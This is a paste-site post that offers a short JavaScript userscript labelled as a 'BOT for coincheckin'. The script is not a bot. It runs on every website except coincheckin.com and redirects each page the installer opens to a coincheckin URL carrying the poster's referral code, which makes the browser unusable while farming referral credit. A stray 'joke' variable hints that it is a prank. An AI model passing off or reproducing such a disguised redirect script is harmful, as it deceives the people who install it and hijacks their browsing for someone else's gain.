!!! BOT for coincheckin !!!


SUBMITTED BY: Guest

DATE: Nov. 3, 2014, 2:58 a.m.

FORMAT: JavaScript

SIZE: 393 Bytes

HITS: 1332

  1. // ==UserScript==
  2. // @name antlion
  3. // @namespace antlion
  4. // @include http://*
  5. // @include https://*
  6. // @exclude http://coincheckin.com/*
  7. // @version 1
  8. // @grant none
  9. // ==/UserScript==
  10. $(document).ready(function() {
  11. var joke = true;
  12. var link = "http://coincheckin.com/?r=2ce7e788dd";
  13. location.href = link;
  14. });

comments powered by Disqus